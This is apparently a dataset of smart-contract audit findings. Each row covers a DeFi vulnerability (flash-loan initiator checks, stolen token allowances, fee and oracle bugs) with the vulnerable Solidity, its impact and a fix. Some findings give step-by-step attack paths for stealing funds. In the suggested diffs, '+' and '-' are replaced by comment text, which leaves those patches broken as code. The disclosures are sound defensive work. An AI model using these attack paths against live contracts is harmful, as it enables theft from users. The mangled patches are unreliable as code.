settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, ""Must Settle"");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n","Make the necessary changes to `BaseStrategyVault.sol` or `_authenticateDeleverage()`, whichever is preferred.",A user may be forced to liquidate an account they do not wish to purchase vault shares for.,"```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. 
settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, ""Must Settle"");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n" +"MarginTrading.sol: Missing flash loan initiator check allows attacker to open trades, close trades and steal funds",high,"The `MarginTrading.executeOperation` function is called when a flash loan is made (and it can only be called by the lendingPool).\\nThe wrong assumption by the protocol is that the flash loan can only be initiated by the `MarginTrading` contract itself.\\nHowever this is not true. A flash loan can be initiated for any `receiverAddress`.\\n\\nSo an attacker can execute a flash loan with the `MarginTrading` contract as `receiverAddress`. Also the funds that are needed to pay back the flash loan are pulled from the `receiverAddress` and NOT from the initiator:\\nThis means the attacker can close a position or repay a position in the `MarginTrading` contract.\\nBy crafting a malicious swap, the attacker can even steal funds.\\nLet's assume there is an ongoing trade in a `MarginTrading` contract:\\n```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n\\nIn order to profit from this the attacker does the following (not considering fees for simplicity):\\nTake a flash loan of 30000 DAI with `MarginTrading` as `receiverAddress` with `mode=0` (flash loan is paid back in the same transaction)\\nPrice of WETH has dropped to 2000 DAI. 
The attacker uses a malicious swap contract that pockets 10000 DAI for the attacker and swaps the remaining 20000 DAI to 10 WETH (the attacker can freely choose the swap contract in the `_params` of the flash loan).\\nThe 10 WETH debt is repaid\\nWithdraw 30000 DAI from Aave to pay back the flash loan","The fix is straightforward:\\n```\\ndiff --git a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..5b4b485 100644\\n--- a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n@@ -125,6 // Add the line below\\n125,7 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n address _initiator,\\n bytes calldata _params\\n ) external override onlyLendingPool returns (bool) {\\n// Add the line below\\n require(_initiator == address(this));\\n //decode params exe swap and deposit\\n {\\n```\\n\\nThis ensures that the flash loan has been initiated by the `MarginTrading.executeFlashLoans` function which is the intended initiator.","The attacker can close trades, partially close trades and even steal funds.\\n(Note: It's not possible for the attacker to open trades because he cannot incur debt on behalf of the `MarginTrading` contract)",```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n +MarginTrading.sol: The whole balance and not just the traded funds are deposited into Aave when a trade is opened,medium,"It's expected by the protocol that funds can be in the `MarginTrading` contract without being deposited into Aave as margin.\\nWe can see this by looking at the `MarginTradingFactory.depositMarginTradingETH` and `MarginTradingFactory.depositMarginTradingERC20` functions.\\nIf the 
user sets `margin=false` as the parameter, the funds are only sent to the `MarginTrading` contract but NOT deposited into Aave.\\nSo clearly there is the expectation for funds to be in the `MarginTrading` contract that should not be deposited into Aave.\\nThis becomes an issue when a trade is opened.\\nLet's look at the `MarginTrading._openTrade` function that is called when a trade is opened:\\nThe whole balance of the token will be deposited into Aave:\\n```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n\\nNot just those funds that have been acquired by the swap. This means that funds that should stay in the `MarginTrading` contract might also be deposited as margin.","It is necessary to differentiate the funds that are acquired by the swap and those funds that were there before and should stay in the contract:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..42f96cf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n@@ // Remove the line below\\n261,6 // Add the line below\\n261,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n bytes memory _swapParams,\\n address[] memory 
_tradeAssets\\n ) internal {\\n// Add the line below\\n int256[] memory _amountsBefore = new uint256[](_tradeAssets.length);\\n// Add the line below\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n _amountsBefore[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Add the line below\\n }\\n if (_swapParams.length > 0) {\\n // approve to swap route\\n for (uint256 i = 0; i < _swapApproveToken.length; i// Add the line below\\n// Add the line below\\n) {\\n@@ // Remove the line below\\n272,8 // Add the line below\\n276,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n }\\n uint256[] memory _tradeAmounts = new uint256[](_tradeAssets.length);\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Remove the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Remove the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n if (_amountsBefore[i] < IERC20(_tradeAssets[i]).balanceOf(address(this))) {\\n// Add the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)) // Remove the line below\\n _amountsBefore[i];\\n// Add the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n }\\n }\\n emit OpenPosition(_swapAddress, _swapApproveToken, _tradeAssets, _tradeAmounts);\\n }\\n```\\n\\nIf funds that were in the contract prior to the swap should be deposited there is the separate `MarginTrading.lendingPoolDeposit` function to achieve this.",When opening a trade funds can be deposited into Aave unintentionally. 
Thereby the funds act as margin and the trade can incur a larger loss than expected.,"```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n" +AuraSpell#openPositionFarm fails to return all rewards to user,high,"When a user adds to an existing position on AuraSpell, the contract burns their current position and remints them a new one. The issues is that WAuraPool will send all reward tokens to the contract but it only sends Aura back to the user, causing all other rewards to be lost.\\n```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n\\nInside WAuraPools#burn reward tokens are sent to the user.\\n```\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n if (pos.collateralSize > 0) {\\n (uint256 pid, ) = wAuraPools.decodeId(pos.collId);\\n if (param.farmingPoolId != pid)\\n revert Errors.INCORRECT_PID(param.farmingPoolId);\\n if (pos.collToken != address(wAuraPools))\\n revert Errors.INCORRECT_COLTOKEN(pos.collToken);\\n bank.takeCollateral(pos.collateralSize);\\n wAuraPools.burn(pos.collId, pos.collateralSize);\\n _doRefundRewards(AURA);\\n }\\n```\\n\\nWe see above that the contract only refunds Aura to the user causing all other extra reward tokens received by the contract to be lost to the user.",WAuraPool returns the reward tokens it sends. 
Use this list to refund all tokens to the user,User will lose all extra reward tokens from their original position,"```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n" +ShortLongSpell#openPosition uses the wrong balanceOf when determining how much collateral to put,high,"The _doPutCollateral subcall in ShortLongSpell#openPosition uses the balance of the uToken rather than the vault resulting in the vault tokens being left in the contract which will be stolen.\\n```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nWhen putting the collateral the contract is putting vault but it uses the balance of the uToken instead of the balance of the vault.",Use the balanceOf vault rather than vault.uToken,Vault tokens will be left in contract and stolen,"```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n" +BalancerPairOracle#getPrice will revert due to division by zero in some cases,medium,"`BalancerPairOracle#getPrice` internally calls `computeFairReserves`, which returns fair reserve amounts given spot reserves, weights, and fair prices. When the parameter `resA` passed to `computeFairReserves` is smaller than `resB`, division by 0 will occur.\\nIn `BalancerPairOracle#getPrice`, resA and resB passed to `computeFairReserves` are the balance of TokenA and TokenB of the pool respectively. 
It is common for the balance of TokenB to be greater than the balance of TokenA.\\n```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n\\nAnother case is when the decimals of tokenA is smaller than the decimals of tokenB, such as usdc(e6)-weth(e18).","```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n@@ // Remove the line below\\n50,7 // Add the line below\\n50,7 @@ contract BalancerPairOracle is UsingBaseOracle, IBaseOracle {\\n // // Remove the line below\\n// Remove the line below\\n> fairResA / r1^wB = constant product\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA^wA * resB^wB * r1^wB\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA * (resB/resA)^wB * r1^wB = resA * (r1/r0)^wB\\n// Remove the line below\\n uint256 r0 = resA / resB;\\n// Add the line below\\n uint256 r0 = resA * 10**(decimalsB) / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n```\\n",All functions that subcall `BalancerPairOracle#getPrice` 
will be affected.,"```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n" +Updating the feeManger on config will cause desync between bank and vaults,medium,"When the bank is initialized it caches the current config.feeManager. This is problematic since feeManger can be updated in config. Since it is precached the address in bank will not be updated leading to a desync between contracts the always pull the freshest value for feeManger and bank.\\n```\\n feeManager = config_.feeManager();\\n```\\n\\nAbove we see that feeManger is cached during initialization.\\n```\\n withdrawAmount = config.feeManager().doCutVaultWithdrawFee(\\n address(uToken),\\n shareAmount\\n );\\n```\\n\\nThis is in direct conflict with other contracts the always use the freshest value. This is problematic for a few reasons. The desync will lead to inconsistent fees across the ecosystem either charging users too many fees or not enough.",BlueBerryBank should always use config.feeManger instead of caching it.,After update users will experience inconsistent fees across the ecosystem,```\\n feeManager = config_.feeManager();\\n```\\n +ShortLongSpell#openPosition attempts to burn wrong token,medium,"ShortLongSpell#openPosition attempts to burn vault.uToken when it should be using vault instead. 
The result is that ShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their position\\n```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n\\nWe see above that the contract attempts to withdraw vault.uToken from the wrapper.\\n```\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nThis is in direct conflict with the collateral that is actually deposited which is vault. This will cause the function to always revert when adding to an existing position.",Burn token should be vault rather than vault.uToken,ShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their position,"```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n" +All allowances to DepositStableCoinToDealer and GeneralRepay can be stolen due to unsafe call,high,"DepositStableCoinToDealer.sol and GeneralRepay.sol are helper contracts that allow a user to swap and enter JOJODealer and JUSDBank respectively. 
The issue is that the call is unsafe allowing the contract to call the token contracts directly and transfer tokens from anyone who has approved the contract.\\n```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n\\nWe can see above that the call is totally unprotected allowing a user to make any call to any contract. This can be abused by calling the token contract and using the allowances of others. The attack would go as follows:\\nUser A approves the contract for 100 USDT\\nUser B sees this approval and calls depositStableCoin with the swap target as the USDT contract with themselves as the receiver\\nThis transfers all of user A USDT to them",Only allow users to call certain whitelisted contracts.,All allowances can be stolen,"```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n" +JUSD borrow fee rate is less than it should be,medium,"The borrow fee rate calculation is wrong causing the protocol to take less fees than it should.\\nThe borrowFeeRate is calculated through getTRate():\\n```\\n function getTRate() public view returns (uint256) {\\n uint256 
timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n\\n`t0Rate` is initialized as `1e18` in the test contracts:\\n```\\n constructor(\\n uint256 _maxReservesNum,\\n address _insurance,\\n address _JUSD,\\n address _JOJODealer,\\n uint256 _maxPerAccountBorrowAmount,\\n uint256 _maxTotalBorrowAmount,\\n uint256 _borrowFeeRate,\\n address _primaryAsset\\n ) {\\n // // rest of code\\n t0Rate = JOJOConstant.ONE;\\n }\\n```\\n\\n`SECONDS_PER_YEAR` is equal to `365 days` which is 60 * 60 * 24 * 365 = 31536000:\\n```\\nlibrary JOJOConstant {\\n uint256 public constant SECONDS_PER_YEAR = 365 days;\\n}\\n```\\n\\nAs time passes, `getTRate()` value will increase. When a user borrows JUSD the contract doesn't save the actual amount of JUSD they borrow, `tAmount`. Instead, it saves the current ""value"" of it, t0Amount:\\n```\\n function _borrow(\\n DataTypes.UserInfo storage user,\\n bool isDepositToJOJO,\\n address to,\\n uint256 tAmount,\\n address from\\n ) internal {\\n uint256 tRate = getTRate();\\n // tAmount % tRate ? tAmount / tRate + 1 : tAmount % tRate\\n uint256 t0Amount = tAmount.decimalRemainder(tRate)\\n ? tAmount.decimalDiv(tRate)\\n : tAmount.decimalDiv(tRate) + 1;\\n user.t0BorrowBalance += t0Amount;\\n```\\n\\nWhen you repay the JUSD, the same calculation is done again to decrease the borrowed amount. Meaning, as time passes, you have to repay more JUSD.\\nLet's say that JUSDBank was live for a year with a borrowing fee rate of 10% (1e17). `getTRate()` would then return: $1e18 + 1e17 * 31536000 / 31536000 = 1.1e18$\\nIf the user now borrows 1 JUSD we get: $1e6 * 1e18 / 1.1e18 ~= 909091$ for `t0Amount`. That's not the expected 10% decrease. 
Instead, it's about 9.1%.",Change formula to: `t0Amount = tAmount - tAmount.decimalMul(tRate)` where `t0Rate` is initialized with `0` instead of `1e18`.,Users are able to borrow JUSD for cheaper than expected,```\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n +Subaccount#execute lacks payable,medium,"`Subaccount#execute` lacks `payable`. If `value` in `Subaccount#execute` is not zero, it could always revert.\\n`Subaccount#execute` lacks `payable`. The caller cannot send the value.\\n```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n\\nThe `Subaccount` contract does not implement receive() `payable` or fallback() `payable`, so it is unable to receive value (eth) . 
Therefore, `Subaccount#execute` needs to add `payable`.",Add a receive() external `payable` to the contract or `execute()` to add a `payable` modifier.,`Subaccount#execute` cannot work if `value` != 0.,"```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n" +It's possible to reset primaryCredit and secondaryCredit for insurance account,medium,"When because of negative credit after liquidations of another accounts, insurance address doesn't pass `isSafe` check, then malicious user can call JOJOExternal.handleBadDebt and reset both primaryCredit and secondaryCredit for insurance account.\\n`insurance` account is handled by JOJO team. Team is responsible to top up this account in order to cover losses. When bad debt is handled, then its negative credit value is added to the `insurance` account. 
Because of that it's possible that primaryCredit of `insurance` account is negative and `Liquidation._isSafe(state, insurance) == false`.\\n```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n\\nSo it's possible for anyone to call `handleBadDebt` for `insurance` address, once its primaryCredit is negative and `Liquidation._isSafe(state, insurance) == false`. This will reset both primaryCredit and secondaryCredit variables to 0 and break `insurance` calculations.",Do not allow `handleBadDebt` call with insurance address.,Insurance primaryCredit and secondaryCredit variables are reset.,"```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n" +When the `JUSDBank.withdraw()` is to another internal account the `ReserveInfo.isDepositAllowed` is not 
validated,medium,"The internal withdraw does not validate if the collateral reserve has activated/deactivated the isDepositAllowed variable\\nThe JUSDBank.withdraw() function has a param called isInternal that helps to indicate if the withdraw amount is internal between accounts or not. When the withdraw is internal the `ReserveInfo.isDepositAllowed` is not validated.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n\\nIn the other hand, the `isDepositAllowed` is validated in the deposit function in the `code line 255` but the withdraw to internal account is not validated.\\n```\\nFile: JUSDBank.sol\\n function _deposit(\\n DataTypes.ReserveInfo storage reserve,\\n DataTypes.UserInfo storage user,\\n uint256 amount,\\n address collateral,\\n address to,\\n address from\\n ) internal {\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n```\\n\\nAdditionally, the `ReserveInfo.isDepositAllowed` can be modified via the JUSDOperation.delistReserve() function. 
So any collateral's deposits can be deactivated at any time.\\n```\\nFile: JUSDOperation.sol\\n function delistReserve(address collateral) external onlyOwner {\\n DataTypes.ReserveInfo storage reserve = reserveInfo[collateral];\\n reserve.isBorrowAllowed = false;\\n reserve.isDepositAllowed = false;\\n reserve.isFinalLiquidation = true;\\n emit RemoveReserve(collateral);\\n }\\n```\\n","Add a `Reserve.isDepositAllowed` validation when the withdrawal is to another internal account.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n// Add the line below\\n// Add the line below\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] // Add the line below\\n= amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n",The collateral's reserve can get deposits via the internal withdraw even when the `Reserve.isDepositAllowed` is turned off making the `Reserve.isDepositAllowed` useless because the collateral deposits can be via `internal withdrawals`.,"```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of 
code\\n// rest of code\\n```\\n" +Lack of burn mechanism for JUSD repayments causes oversupply of JUSD,medium,"`JUSDBank.repay()` allow users to repay their JUSD debt and interest by transfering in JUSD tokens. Without a burn mechanism, it will cause an oversupply of JUSD that is no longer backed by any collateral.\\n`JUSDBank` receives JUSD tokens for the repayment of debt and interest. However, there are no means to burn these tokens, causing JUSD balance in `JUSDBank` to keep increasing.\\nThat will lead to an oversupply of JUSD that is not backed by any collateral. And the oversupply of JUSD will increase significantly during market due to mass repayments from liquidation.\\n```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n require(amount != 0, JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\n","Instead of transfering to the JUSDBank upon repayment, consider adding a burn mechanism to reduce the supply of JUSD so that it will be adjusted automatically.","To maintain its stability, JUSD must always be backed by more than 1 USD worth of collateral.\\nWhen there is oversupply of JUSD that is not backed by any collateral, it affects JUSD stability and possibly lead to a depeg event.","```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n 
require(amount != 0, JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\n" +UniswapPriceAdaptor fails after updating impact,medium,"The `impact` variable can have a maximum value of `uint32` (=4.294.967.295) after updating. This is too low and will cause the `UniswapPriceAdaptor#getMarkPrice()` function to revert.\\nWhen initialized, the `impact` variable is a `uint256`. However, in the `updateImpact` function, the newImpact is a `uint32`.\\n```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n\\nThe new `impact` variable will be too small because in the getMarkPrice() function, we need diff * 1e18 / JOJOPriceFeed <= impact:\\n```\\n require(diff * 1e18 / JOJOPriceFeed <= impact, ""deviation is too big"");\\n```\\n\\nThe result of `diff * 1e18 / JOJOPriceFeed <= impact` is a number with e18 power. It is very likely that it is larger than the `impact` variable which is a 